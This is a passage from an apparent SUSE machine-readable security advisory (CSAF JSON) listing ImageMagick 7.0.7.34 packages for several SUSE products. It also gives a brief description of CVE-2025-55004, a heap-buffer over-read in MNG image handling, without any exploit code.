"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-55004",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55004"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-1, ImageMagick is vulnerable to heap-buffer overflow read around the handling of images with separate alpha channels when performing image magnification in ReadOneMNGIMage. This can likely be used to leak subsequent memory contents into the output image. This issue has been patched in version 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
